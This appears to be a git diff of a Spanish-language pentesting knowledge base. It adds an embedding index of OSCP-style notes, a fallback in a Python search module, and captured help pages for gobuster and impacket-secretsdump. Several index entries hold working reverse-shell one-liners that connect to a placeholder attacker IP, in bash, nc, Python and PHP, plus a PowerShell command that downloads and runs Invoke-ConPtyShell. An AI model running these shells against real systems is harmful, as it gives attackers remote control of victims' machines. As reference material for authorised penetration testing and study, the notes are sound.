0.01643, 0.03008, 0.0882, -0.04123, 0.02287, 0.02166, -0.0002, 0.04652, 0.11534, -0.02139, 0.00147, -0.0484, 0.00133, -0.0074, -0.13392, 0.02594, 0.02276, -0.02006, -0.03522, 0.09955, -0.07364, 0.08103, 0.02136, 0.08725, -0.05045, 0.02124, 0.02247, 0.01028, 0.11887, 0.03157, 0.04053, -0.08461, -0.07025, -0.01312, -0.0731, 0.06344, 0.01568, -0.05203, 0.04377, -0.03266, 0.01224, 0.0166, -0.05691, -0.14456, -0.06603, -0.0568, -0.06027, 0.04102, 0.0607, -0.02287, 0.03891, 0.05796, 0.04782, -0.01716, 0.02954, -0.05276, 0.01356, -0.00608, -0.05471, -0.03176, -0.06126, 0.09218, 0.00121, -0.03596, -0.03415, 0.01659, -0.05273, -0.05428, 0.02799, 0.02774, -0.01479, 0.04089, 0.04525, -0.00937, -0.00455, 0.01868, 0.03725, -0.0888, 0.04596, 0.03287, 0.10482, 0.0553, 0.07815, -0.04645, -0.02024, -0.06119, -0.06341, -0.05637, 0.00012, 0.08252, -0.02598, -0.03166, -0.02586, -0.02011, -0.00568, -0.04891, -0.05236, 0.01916, -0.03746, -0.07474, 0.02399, -0.01938, 0.03582, -0.03868, 0.04027, 0.04268, 0.03409, 0.01155, 0.00692, 0.05352, -0.03901, -0.06445, 0.00684, 0.10379, 0.06464, 0.02311, 0.01905, -0.04927, 0.00517, 0.04405, 0.03868, -0.00627, 0.02911, 0.02659, -0.10099, 0.03371, 0.04086, -0.02232, 0.03092, 0.03667, -0.02589, 0.06799, -0.07967, -0.05513, -0.04059, 0.06308, 0.06104, -0.02711, -0.05211, 0.02413, 0.02172, 0.05747, -0.03004, 0.10258, 0.01515, 0.0024, 0.00589, -0.01889, -0.05068, 0.05404, -0.01744, -0.03276, 0.02326, -0.10355, -0.03966, -0.02079, 0.02302, 0.00646, 0.01707, 0.04676, -0.0462, 0.04414, 0.0179, -0.02445, -0.0064, -0.00052, 0.0407, 0.01785, 0.0059, -0.03525, -0.05011, -0.03772, 0.04539, -0.01315]} +{"tipo": "metodologia", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "texto": "## Windows\n- Usa **Invoke-ConPtyShell** (Reverse shell) para una shell interactiva real.\n- Listener con `stty raw -echo; (stty size; cat) | nc -lvnp 4444`.", "v": [-0.03953, -0.16918, -0.05861, -0.0136, 0.07065, -0.16618, -0.14572, -0.04694, 0.20414, 0.04237, -0.11714, -0.16983, 0.0276, -0.08702, -0.06558, 0.0452, -0.19986, -0.02753, 0.00882, 0.00092, -0.07753, 0.00075, -0.23429, -0.03418, 0.00269, 0.17816, -0.02621, 0.15892, 0.01197, 0.04044, -0.02438, -0.12156, -0.11801, 0.01412, -0.0935, -0.00857, 0.02689, -0.04215, 0.02003, 0.21065, 0.05276, 0.05639, -0.17019, 0.19111, 0.16392, -0.05963, 0.05347, -0.04391, 0.09121, 0.00792, -0.06399, 0.00917, -0.17924, 0.06063, -0.00154, -0.04331, 0.03851, -0.05583, 0.01157, -0.0301, -0.1516, -0.06155, -0.0484, -0.00745, 0.04096, 0.04079, 0.06037, -0.15163, -0.09006, 0.07362, -0.07051, -0.05385, 0.05785, -0.07176, 0.05395, 0.0306, 0.01209, -0.15544, 0.01581, 0.03898, -0.10721, -0.08503, 0.08747, -0.04708, -0.02177, -0.00834, -0.00192, -0.13715, 0.03343, -0.04387, 0.05692, 0.03068, -0.03621, 0.04811, 0.03227, -0.02089, -0.05154, 0.03585, -0.01459, -0.02094, 0.00094, 0.02887, -0.03974, 0.01552, 0.02506, 0.06717, -0.04078, -0.04364, -0.01569, 0.06993, 0.10955, -0.0051, 0.00919, -0.01987, 0.0073, 0.00379, -0.09708, -0.03696, 0.04654, -0.03141, -0.0134, 0.00122, -0.04324, 0.02966, -0.01823, 0.01042, -0.05819, 0.01899, -0.05439, -0.00367, 0.04605, -0.01946, 0.03621, -0.07518, -0.0667, 0.02464, 0.03672, -0.04407, 0.04093, -0.04201, 0.004, 0.04564, -0.01154, 0.01442, -0.00017, 0.00218, -0.01501, 0.00433, -0.00068, -0.0045, 0.10726, 0.04753, -0.02847, 0.01894, 0.00756, -0.0369, 0.04321, 0.03169, -0.04096, -0.03689, 0.0233, 0.02832, 0.01534, 0.00756, -0.03419, -0.02942, -0.04367, -0.02824, -0.0056, -0.03569, 0.01541, 0.00988, 0.06375, -0.07869, -0.07656, -0.00888, 0.04766, -0.00679, -0.01279, -0.07042, 0.03425, -0.05225, 0.04636, -0.04195, -0.01236, 0.00016, 0.00632, 0.04159, -0.08019, 0.02166, 0.00209, -0.00107, 0.03662, -0.00888, 0.00912, 0.06262, 0.00215, -0.0549, -0.03395, 0.01357, -0.04832, 0.02871, 0.01852, -0.05773, 0.0413, 0.02178, -0.03491, 0.03901, 0.00958, -0.03977, 0.01032, -0.01381, 0.01571, 0.0697, -0.02293, -0.04913, -0.04805, 0.02137, -0.00513, -0.00913, -0.02959, 0.0227, 0.01232, 0.0045, -0.01074, 0.02408, 0.01477, -0.03635, 0.00223, -0.06237, -0.02969, 0.00448, 0.03629, -0.00873, -0.03637, -0.06346, -0.03279, 0.02132, -0.0121, -0.05124, 0.01502, 0.0287, -0.03511, -0.02025, 0.02557, -0.00938, -0.02477, 0.00887, -0.00734, -0.01475, -0.06777, -0.02221, -0.0278, -0.0427, -0.03723, -0.00154]} +{"tipo": "metodologia", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "texto": "## Por qué\n- Sin TTY: muchos exploits de Privesc Linux (los que piden `sudo`/interacción) fallan.\n\nRelacionado: Puesto de mando Kali · OSCP MOC", "v": [-0.21132, -0.0084, -0.15479, 0.00158, -0.01941, -0.18652, -0.04816, 0.02168, -0.0642, 0.09594, 0.09369, 0.03698, 0.11458, -0.07577, 0.01039, -0.08029, -0.01391, -0.11539, 0.04028, -0.06894, -0.06848, 0.04139, -0.01001, -0.01612, 0.21149, 0.15387, 0.12056, -0.11205, -0.01661, -0.02629, -0.08067, 0.04187, -0.01238, 0.05545, -0.07717, 0.02006, -0.0071, -0.0225, 0.11516, 0.23138, 0.00041, 0.01427, -0.13039, 0.02746, 0.03444, -0.1691, 0.00229, 0.04444, 0.09346, 0.03149, -0.02681, -0.10673, -0.13234, -0.01351, 0.13028, 0.03317, 0.09512, -0.0437, 0.05719, 0.0054, -0.14718, -0.00044, -0.02781, -0.02799, 0.0868, -0.0605, -0.05478, 0.00844, -0.15685, 0.12832, -0.02914, 0.16253, -0.13206, 0.01812, 0.07044, -0.03422, 0.02092, 0.02025, 0.11825, 0.0376, -0.034, -0.01932, 0.01724, -0.02202, -0.11847, -0.1014, 0.10858, -0.01391, -0.11145, -0.00308, 0.10942, 0.06707, -0.03523, -0.0015, 0.12512, -0.0306, 0.0167, 0.07112, 0.03676, 0.04433, -0.04645, 0.07331, -0.05436, 0.01986, 0.00548, 0.08497, 0.01891, -0.00845, 0.10368, 0.05557, 0.03736, -0.02349, 0.05029, -0.06375, -0.01872, -0.01744, -0.06821, -0.07852, -0.01389, -0.09883, -0.0898, 0.00028, 0.07523, -0.06384, -0.02886, -0.012, -0.07421, 0.10901, -0.01605, 0.00506, 0.03368, -0.0991, 0.02013, -0.03056, -0.00345, -0.01099, 0.0519, -0.093, -0.00788, -0.08409, 0.05329, 0.03746, 0.02276, -0.00631, 0.09513, 0.05891, 0.02753, -0.02061, -0.02625, -0.00774, -0.03469, 0.01608, -0.03857, -0.01629, 0.019, -0.05057, -0.00809, -0.04666, -0.02288, -0.00128, 0.063, 0.01024, 0.00195, 0.01294, -0.04356, -0.02051, 0.0209, 0.013, 0.00647, -0.02435, -0.02191, 0.0178, -0.05072, -0.00968, 0.00027, -0.11222, 0.06661, -0.01336, -0.02562, 0.02694, -0.01042, 0.00298, 0.00994, 0.01645, 0.03945, 0.01013, -0.00615, -0.03254, -0.03548, 0.02319, 0.06854, 0.0461, 0.00938, -0.02614, 0.03493, -0.00229, -0.02922, -0.048, -0.0023, 2e-05, -0.02929, 0.03536, -0.01996, -0.01178, 0.03362, -0.04684, -0.00936, 0.02687, -0.03126, 0.0547, 0.03593, 0.03364, 0.06155, -0.02981, 0.01223, 0.00917, 0.03691, 0.07559, 0.04163, -0.02157, -0.01857, 0.02071, 0.06135, -0.0197, -0.02627, 0.01113, -0.02678, 0.01306, -0.02615, 0.00116, 0.00964, -0.03203, 0.00086, -0.03079, -0.01799, 0.01254, -0.01698, 0.0147, -0.00981, -0.03582, 0.00209, 0.03774, 0.02745, -0.10108, -0.06502, -0.07847, -0.0378, 0.00021, -0.02744, -0.04385, 0.0201, -0.00385, 0.01873, -0.04726, -0.01321, 0.02601]} +{"tipo": "metodologia", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "texto": "# Reverse shell\n\n> El foothold: la víctima se conecta de vuelta a tu listener. Recíbela en el Puesto de mando Kali.", "v": [-0.10887, 0.04825, -0.18147, 0.02654, -0.15319, -0.06089, -0.1167, -0.00317, 0.09209, -0.09943, -0.10152, -0.15141, 0.07112, 0.02451, 0.17427, 0.08223, -0.05591, 0.12919, 0.06072, -0.2011, -0.06682, 0.00143, -0.05432, -0.04849, 0.07096, 0.14062, 0.09391, 0.11403, 0.05825, -0.0318, -0.00635, -0.12611, -0.13356, 0.02134, -0.03426, 0.01774, -0.00843, -0.00288, 0.08605, 0.08451, -0.04636, 0.05974, -0.08497, -0.03002, 0.01381, -0.08391, 0.0541, -0.04833, 0.13409, 0.15321, -0.03392, -0.01132, -0.18262, -0.09275, 0.08496, -0.02458, 0.24533, 0.00809, 0.04782, -0.11507, -0.0257, -0.07219, -0.02104, 0.03204, 0.05781, -0.09131, 0.05641, -0.01021, -0.03806, -0.03184, -0.04219, 0.03267, -0.04546, 0.0, -0.02081, -0.10225, 0.04262, 0.0279, 0.12062, 0.0803, -0.10026, -0.10219, -0.08235, -0.02033, -0.03773, 0.09896, 0.10039, -0.08899, -0.05488, 0.00092, 0.04941, -0.03298, -0.06407, -0.00514, 0.03755, -0.01909, 0.016, 0.0204, -0.10672, -0.024, 0.05802, 0.01353, 0.05448, 0.04818, 0.02943, -0.01291, -0.01463, -0.07747, 0.0478, 0.09067, -0.021, 0.0184, -0.00714, -0.07604, 0.02153, -0.00056, -0.06662, -0.04652, 0.02846, -0.00592, 0.10299, 0.00572, 0.06378, -0.06325, -0.06118, 0.03166, -0.06836, -0.02923, 0.05594, 0.00432, 0.02148, 0.03347, 0.03863, -0.07665, -0.00435, 0.01159, 0.00899, -0.01235, 0.00271, -0.00869, 0.0679, 0.06787, -0.02563, 0.00076, 0.01292, -0.06476, 0.03924, -0.00418, -0.04672, 0.0287, -0.01424, 0.07953, 0.00787, -0.0182, -0.0047, -0.04877, 0.02261, -0.01875, 0.01496, 0.08983, -0.03489, -0.00368, -0.01025, 0.02685, 0.05122, -0.05707, -0.00604, -0.02751, 0.06265, -0.01048, -0.08141, -0.04085, 0.08116, -0.02987, -0.04741, -0.11356, 0.01293, -0.05886, 0.02709, -0.00688, 0.033, 0.02563, -0.02054, -0.01206, 0.05099, 0.05244, -0.03632, 0.00246, 0.00021, 0.0634, 0.04873, 0.03141, -0.02176, 0.03422, 0.04236, 0.00304, -0.02799, -0.03304, -0.10171, 0.05039, -0.0597, 0.04139, -0.00571, -0.07405, 0.02976, -0.03175, -0.06243, -0.04018, -0.00948, 0.02109, 0.04622, -0.04519, 0.05433, 0.04321, -0.00901, -0.06489, 0.01325, -0.03256, 0.02321, 0.06792, -0.06004, 0.01209, 0.02971, 0.049, -0.01617, 0.03313, 0.03539, -0.01459, -0.00677, -0.04292, -0.03419, -0.02446, 0.00949, -0.03862, -0.10146, -0.00281, -0.00262, 0.00239, -0.05415, -0.01792, 0.00414, -0.00502, 0.01566, -0.04705, 0.02768, 0.01338, 0.00934, 0.03949, -0.05206, -0.05035, -0.02316, -0.0088, -0.03367, -0.121, -0.00683, -0.0682]} +{"tipo": "metodologia", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "texto": "# para Windows ConPtyShell, estabilizado:\nstty raw -echo; (stty size; cat) | nc -lvnp 4444\n```", "v": [-0.10725, -0.18191, -0.04603, -0.03517, 0.06002, -0.1448, -0.0746, -0.0522, 0.1088, 0.10875, -0.15548, -0.1221, -0.04282, -0.00508, -0.13327, 0.03886, -0.19862, -0.04306, 0.0096, 0.04472, -0.17293, -0.09461, -0.11122, -0.04122, 0.05095, 0.16458, -0.04022, 0.16855, -0.1312, 0.07672, 0.03888, -0.03257, -0.16519, 0.02969, -0.01149, 0.06749, 0.02895, -0.04229, -0.07521, 0.23696, 0.04576, -0.03806, -0.02009, 0.12361, 0.19521, -0.10709, 0.02753, -0.09128, 0.13586, -0.06971, -0.03848, -0.00491, -0.10536, -0.01698, -0.03856, -0.0512, 0.00047, 0.00841, 0.06002, -0.02453, -0.12807, -0.05319, -0.07973, 0.01181, -0.04912, 0.04918, 0.06882, -0.10895, -0.12327, 0.11616, -0.07953, -0.07841, 0.03052, -0.11214, 0.12243, 0.03926, -0.02462, -0.15639, 0.05223, 0.04777, -0.08519, -0.01271, 0.0782, -0.08782, -0.02556, -0.02678, -0.04863, -0.09038, 0.01578, -0.02519, 0.10797, -0.01946, -0.0412, 0.03862, 0.01673, -0.03974, -0.05007, 0.00594, 0.02363, -0.01921, 0.01089, -0.03561, -0.02505, -0.02777, -0.01398, 0.03745, 0.00368, -0.03276, -0.01451, 0.05091, 0.09411, 0.06386, 0.05453, -0.02212, 0.04165, 0.00051, -0.05996, 0.00314, 0.0191, -0.0405, 0.01748, 0.01902, -0.02666, 0.04385, -0.05238, 0.01376, 0.00295, 0.03498, -0.08337, 0.00101, 0.06221, -0.00158, 0.02358, -0.0667, -0.07469, 0.04717, 0.0455, -0.06058, 0.03709, -0.05571, -0.03969, 0.03738, 0.03125, 0.03004, 0.06077, 0.01914, -0.01273, -0.01134, 0.03446, 0.02556, 0.12564, 0.07857, -0.03021, -0.00311, -0.02498, 0.004, 0.02192, 0.04516, -0.00306, -0.08928, 0.05012, 0.07651, 0.05347, -0.01457, -0.01376, -0.0157, -0.02344, -0.05493, -0.0036, -0.08014, 0.01604, 0.03344, 0.0201, -0.0928, -0.06668, -0.01494, 0.02594, 0.01887, -0.04666, -0.02483, 0.01117, -0.02589, 0.05499, -0.03811, 0.02089, 0.01842, 0.00924, 0.05424, -0.05176, 0.02597, 0.0014, -0.01928, -0.04088, -0.04008, -0.00657, 0.01439, -0.01546, -0.04199, -0.04026, 0.0041, -0.03669, 0.0179, 0.02856, -0.05438, 0.04476, -0.01957, -0.02596, 0.05485, 0.0041, -0.00867, 0.01269, -0.01845, 0.0187, 0.03651, -0.0639, -0.02953, -0.03399, 0.01424, -0.01903, -0.02922, -0.03674, -0.00409, 0.0324, 0.01437, 0.01748, 0.03627, 0.01384, -0.04596, -0.01701, -0.04689, -0.0428, 0.00758, 0.01167, -0.00913, -0.0057, -0.06464, -0.02519, -0.01547, -0.00204, -0.04346, 0.02576, 0.02683, -0.03218, -0.03467, -0.01221, -0.01339, -0.00769, 0.00976, 0.00116, -0.00464, -0.0148, -0.03833, -0.01693, -0.05324, -0.04513, 0.03562]} +{"tipo": "metodologia", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "texto": "### Windows (PowerShell, interactiva con ConPtyShell)\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\nEl script se sirve desde tu HTTP (Transferencia de ficheros).", "v": [-0.09936, -0.1538, -0.14354, -0.03259, 0.12921, -0.19931, 0.0768, -0.18963, 0.07051, 0.06579, -0.08739, 0.08406, 0.01181, -0.08591, -0.05083, 0.08121, -0.07811, -0.11195, 0.05009, -0.03074, -0.01335, 0.16839, -0.27217, -0.0436, -0.02448, 0.11033, -0.14581, 0.12914, -0.118, -0.18275, -0.05027, -0.14246, -0.10039, -0.01859, -0.13148, -0.06433, -0.09089, 0.19112, 0.13446, 0.18735, 0.03345, 0.10644, -0.0865, 0.06372, 0.05572, -0.01357, 0.06091, -0.08317, 0.06648, -0.0168, -0.08997, -0.08793, -0.11052, 0.00732, -0.04749, 0.00679, 0.09491, -0.03206, -0.0344, -0.03284, -0.03303, 0.05666, -0.05134, 0.04481, 0.05486, -0.07862, -0.01953, -0.11788, -0.03324, 0.05615, -0.07836, -0.0025, -0.02415, -0.06695, 0.12655, -0.02372, -0.00799, -0.11407, 0.03972, 0.03033, -0.06588, -0.00589, -0.05628, -0.06979, -0.03141, 0.00813, 0.00348, -0.16639, 0.00801, -0.06217, 0.11721, 0.0115, -0.02326, 0.05185, 0.03242, -0.03641, -0.03653, 0.04579, 0.008, -0.0077, -0.0475, 0.02341, -0.08074, 0.07221, 0.08142, 0.09148, 0.0244, 0.01641, 0.01772, -0.02222, 0.0305, 0.04443, -0.02306, -0.03265, 0.00347, -0.01129, -0.05449, -0.03322, 0.0368, -0.05677, -0.04528, -0.01739, 0.02041, -0.00785, 0.00134, 0.03987, -0.04743, 0.05394, -0.00244, -0.00965, 0.02042, -0.05138, -0.01619, -0.02385, 0.00494, 0.01739, -0.01391, -0.00057, 0.01971, -0.01394, 0.0445, 0.02179, 0.01502, 0.00854, 0.02371, -0.01376, 0.03272, -0.02514, 0.0099, 0.0139, 0.06323, 0.00633, 0.00253, 0.04442, -0.00663, -0.02329, 0.01348, -0.02759, -0.05252, -0.02573, -0.01253, 0.01252, 0.06754, 0.03851, 0.0231, 0.02162, -0.06529, 0.01224, 0.01498, -0.02273, 0.03099, 0.0091, -0.01176, -0.04597, -0.03923, -0.06553, 0.02227, 0.02126, -0.01333, -0.04993, -0.00233, -0.06525, 0.00729, 0.01811, -0.0728, 0.02842, 0.00673, -0.01019, -0.01222, -0.0208, 0.02133, 0.00221, -0.01314, -0.06863, 0.02239, -0.01937, -0.00784, -0.07903, 0.01356, -0.04026, -0.05885, -0.01996, -0.02949, -0.00425, 0.05031, -0.01462, -0.00207, 0.01343, -0.02351, -0.03248, 0.02627, -0.01641, 0.07416, 0.00839, -0.04768, -0.03798, 0.04148, 0.04832, -0.04073, 0.03247, -0.01561, -0.00138, -0.01977, -0.02729, 0.04963, 0.02526, 0.04785, -0.03537, 0.01515, -0.00344, -0.01223, 0.03729, -0.03381, -0.06646, 0.0176, -0.03159, -0.04471, 0.00399, -0.04381, -0.01134, -0.00942, 0.00038, -0.00179, -0.04768, -0.02074, -0.07619, -0.08356, 0.02937, 0.00639, -0.02915, -0.02081, -0.03959, -0.00082, -0.04079, -0.0032, 0.01841]} +{"tipo": "metodologia", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "texto": "### Linux (varios lenguajes)\n```bash\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TU_IP 4444 >/tmp/f # nc sin -e\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'\nperl -e 'use Socket;...' # cuando solo hay perl\nphp -r '$s=fsockopen(\"TU_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n```\n> Más payloads (war/aspx/jsp, x64, encoders) → genera con msfvenom. Referencia viva: revshells.com.", "v": [0.19334, -0.24282, -0.10661, -0.00146, 0.08814, -0.20608, -0.0366, -0.04468, 0.02142, 0.13175, -0.10779, 0.01911, 0.05825, -0.10413, -0.07887, 0.00013, -0.1436, -0.13061, 0.06331, -0.0457, -0.00535, 0.1419, -0.19842, -0.07852, -0.00352, 0.20537, -0.07595, 0.0402, -0.12499, -0.06936, 0.08544, -0.06528, -0.03153, -0.00353, -0.11581, -0.0183, 0.0605, 0.05056, -0.01621, 0.28681, -0.04617, 0.05198, -0.13695, 0.11184, 0.02414, -0.12129, 0.05844, -0.02385, 0.03762, -0.04366, -0.00666, -0.0392, -0.01613, 0.0292, -0.09918, 0.03917, 0.0982, -0.02054, -0.02916, 0.01806, -0.04809, 0.03824, -0.09686, -0.12175, 0.08016, -0.05511, 0.0188, -0.0603, -0.07632, 0.00495, -0.06404, 0.03788, -0.05563, -0.03674, 0.0859, -0.02838, 0.02585, -0.12269, 0.09106, 0.07008, -0.10382, -0.04354, -0.05024, -0.04767, -0.02614, -0.08082, 0.06686, -0.01459, -0.0272, -0.0163, 0.03239, 0.07402, -0.02299, -0.01869, 0.01585, -0.0447, 0.00909, 0.02227, 0.02172, -0.0162, -0.00244, 0.03891, -0.09879, 0.07456, 0.07617, -0.02107, 0.09477, -0.00235, 0.01442, 0.02699, 0.0666, 0.01701, 0.08228, -0.08358, -0.00518, -0.0452, -0.06342, 0.02945, 0.09625, -0.01835, -0.00688, -0.0392, 0.01131, 0.0179, -0.02459, 0.0238, -0.02217, 0.07056, -0.03002, -0.03066, 0.05261, -0.02415, 0.03709, -0.00888, -0.01377, 0.08967, 0.04807, -0.03758, 0.00959, -0.00642, 0.03635, 0.0008, -0.02758, 0.04846, 0.12048, -0.00214, 0.02988, -0.07193, -0.04399, 0.02454, 0.06461, 0.03202, -0.01206, 0.02148, -0.02294, -0.00802, 0.0242, -0.03622, -0.03858, 0.00697, 0.02347, 0.0547, 0.0343, 0.02855, -0.02419, 0.01836, -0.02654, -0.03985, 0.00686, -0.01462, 0.00783, -0.01037, -0.01756, -0.05174, -0.04957, -0.13232, 0.07346, -0.00269, -0.02121, -0.00224, 0.01424, -0.09431, -0.00218, 0.0121, 0.0236, -0.00457, 0.02996, 0.01293, -0.00483, 0.01788, 0.09272, 0.05258, -0.03498, -0.00672, 0.008, -0.01678, -0.00442, -0.07161, -0.01565, -0.01994, -0.04872, 0.05014, 0.0202, -0.03183, -0.02837, -0.04854, -0.02989, 0.00887, -0.01586, -0.02068, 0.02742, -0.02348, 0.00229, 0.00518, -0.08348, -0.00631, 0.00057, 0.07905, 0.05529, 0.01488, -0.01334, 0.03932, 0.01102, 0.0098, 0.0188, -0.01498, 0.02418, -0.03428, 0.02297, -0.03616, -0.01157, 0.06327, 0.0306, -0.05376, -0.00964, -0.03906, -0.03294, -0.00071, -0.01443, -0.07953, 0.0178, 0.02209, -0.04381, -0.0523, -0.01408, -0.02711, -0.06229, 0.01568, -0.01297, 0.01209, -0.06494, -0.02453, -0.03736, -0.06017, -0.01893, 0.00636]} +{"tipo": "metodologia", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "texto": "## Después\n- **Estabiliza** la shell → Estabilizar shell TTY.\n- Si no conecta, sospecha Egress filtering (prueba 80, 443, 53, 4444).\n- Luego: PEASS-ng → Privesc Linux / Privesc Windows.\n\nRelacionado: Egress filtering · msfvenom · Metasploit · OSCP MOC", "v": [-0.08557, -0.12198, -0.09631, -0.12351, 0.06203, -0.13217, -0.08936, -0.10193, 0.05874, 0.04479, -0.06896, 0.18307, 0.00802, -0.08379, 0.09866, -0.00501, -0.01204, -0.09064, -0.06477, -0.02133, -0.08796, 0.06227, -0.17822, -0.10002, 0.15794, 0.2487, -0.11024, 0.05231, -0.0557, -0.0585, 0.02259, 0.04664, -0.00832, -0.00243, -0.00979, 0.057, -0.01734, -0.03135, 0.11175, 0.19748, 0.08772, 0.11255, -0.01521, 0.05914, 0.15416, -0.20966, 0.03507, -0.0519, 0.02793, 0.04497, -0.13752, -1e-05, -0.17112, 0.07999, 0.02506, 0.02439, 0.10069, -0.02444, 0.08144, 0.09463, -0.09777, -0.00036, -0.01356, -0.03356, 0.10488, -0.09524, 0.05018, -0.02034, -0.18502, 0.05664, 0.03111, 0.09931, -0.02382, -0.06541, 0.06284, -0.00154, 0.03385, 0.01367, 0.14395, 0.07832, -0.01119, -0.02005, 0.02331, -0.01539, -0.10332, -0.03765, -0.06462, -0.05195, -0.07226, 0.03345, 0.08894, -0.00403, -0.09001, 0.08483, 0.05073, -0.12277, -0.04222, 0.04353, 0.03483, 0.01818, 0.06373, 0.01546, -0.0273, 0.12551, 0.01197, -0.07524, 0.031, -0.06056, 0.01536, 0.03227, 0.03966, -0.00847, 0.00808, -0.0416, -0.0002, -0.01212, 0.00152, -0.03489, 0.05965, 0.00245, -0.04643, -0.04911, -0.0285, -0.03687, -0.04707, 0.01802, -0.02769, 0.08446, -0.04712, -0.01628, 0.06314, 0.03241, -0.05785, 0.00079, -0.04205, 0.0257, 0.0453, -0.06459, 0.00664, -0.06521, 0.03779, 0.04519, 0.02909, 0.05526, 0.11562, 0.01687, 0.02149, -0.02506, -0.00403, 0.05674, 0.03876, 0.01222, -0.02919, -0.01275, -0.00011, -0.0007, 0.01797, -0.0015, -0.02458, -0.03487, 0.08389, 0.02593, -0.02445, 0.0186, -0.02067, 0.02697, -0.00515, -0.01212, 0.00653, -0.03835, 0.03171, -0.01023, -0.05545, -0.04223, 0.00283, -0.11257, 0.02798, -0.00285, -0.03341, -0.01543, -0.00261, -0.0269, 0.0252, -0.07638, 0.00663, 0.00833, 0.00142, 0.03173, -0.01658, -0.00331, 0.03077, 0.01942, -0.05632, -0.02446, 0.00788, 0.03445, -0.01317, -0.12664, -0.04764, -0.00515, -0.04149, 0.0613, -0.02045, -0.05306, -0.01266, -0.00483, 0.00853, -0.03703, 0.04784, -0.04748, -0.02825, 0.02281, 0.04282, -0.02585, -0.02413, 0.0149, 0.01282, 0.04761, 0.02383, 0.05709, -0.05569, 0.03185, 0.08746, 0.01931, 0.00411, -0.00808, -0.00358, -0.05332, 0.02485, -0.04924, 0.01892, -0.00511, 0.01483, -0.04586, -0.01691, -0.0117, -0.00439, -0.00975, 0.01103, -0.03774, 0.02704, 0.03626, -0.0058, -0.03017, -0.0459, -0.06178, -0.02525, 0.00671, 0.02684, 0.00808, -0.01176, -0.03845, 0.0066, -0.08179, -0.03246, 0.02778]} diff --git a/nucleo/saber/busca.py b/nucleo/saber/busca.py index db2fed1..36db9f2 100644 --- a/nucleo/saber/busca.py +++ b/nucleo/saber/busca.py @@ -22,18 +22,31 @@ import os AQUI = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) INDICE = os.path.join(AQUI, "datos", "saber.jsonl") +# El indice portable que viene en el repo. Se usa tal cual mientras no exista el +# personal, para que un clon recien hecho ya sepa de pentesting sin reindexar. +INDICE_PUBLICO = os.path.join(AQUI, "datos", "saber-publico.jsonl") _modelo = None _entradas = None _matriz = None +def _fuente(): + """El indice personal si existe; si no, el publico que trae el repo.""" + if os.path.exists(INDICE): + return INDICE + if os.path.exists(INDICE_PUBLICO): + return INDICE_PUBLICO + return None + + def _carga(): global _modelo, _entradas, _matriz if _entradas is not None: return _entradas is not False - if not os.path.exists(INDICE): + fuente = _fuente() + if not fuente: _entradas = False return False @@ -41,7 +54,7 @@ def _carga(): from model2vec import StaticModel entradas, vectores = [], [] - with open(INDICE, encoding="utf-8") as f: + with open(fuente, encoding="utf-8") as f: for l in f: try: d = json.loads(l) @@ -190,4 +203,4 @@ def resumen(tope_temas: int = 10) -> str: def disponible() -> bool: - return os.path.exists(INDICE) + return _fuente() is not None diff --git a/nucleo/saber/conocimiento/09 - Manuales/gobuster.md b/nucleo/saber/conocimiento/09 - Manuales/gobuster.md new file mode 100644 index 0000000..98663d9 --- /dev/null +++ b/nucleo/saber/conocimiento/09 - Manuales/gobuster.md @@ -0,0 +1,35 @@ +# gobuster — manual + +Salida de `gobuster --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos). + +``` +Usage: + gobuster [command] + +Available Commands: + completion Generate the autocompletion script for the specified shell + dir Uses directory/file enumeration mode + dns Uses DNS subdomain enumeration mode + fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body + gcs Uses gcs bucket enumeration mode + help Help about any command + s3 Uses aws bucket enumeration mode + tftp Uses TFTP enumeration mode + version shows the current version + vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter) + +Flags: + --delay duration Time each thread waits between requests (e.g. 1500ms) + -h, --help help for gobuster + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist + +Use "gobuster [command] --help" for more information about a command. +``` diff --git a/nucleo/saber/conocimiento/09 - Manuales/impacket-secretsdump.md b/nucleo/saber/conocimiento/09 - Manuales/impacket-secretsdump.md new file mode 100644 index 0000000..06a5e1a --- /dev/null +++ b/nucleo/saber/conocimiento/09 - Manuales/impacket-secretsdump.md @@ -0,0 +1,89 @@ +# impacket-secretsdump — manual + +Salida de `impacket-secretsdump -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos). + +``` +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY] + [-security SECURITY] [-sam SAM] [-ntds NTDS] + [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE] + [-use-vss] [-rodcNo RODCNO] [-rodcKey RODCKEY] + [-use-keylist] + 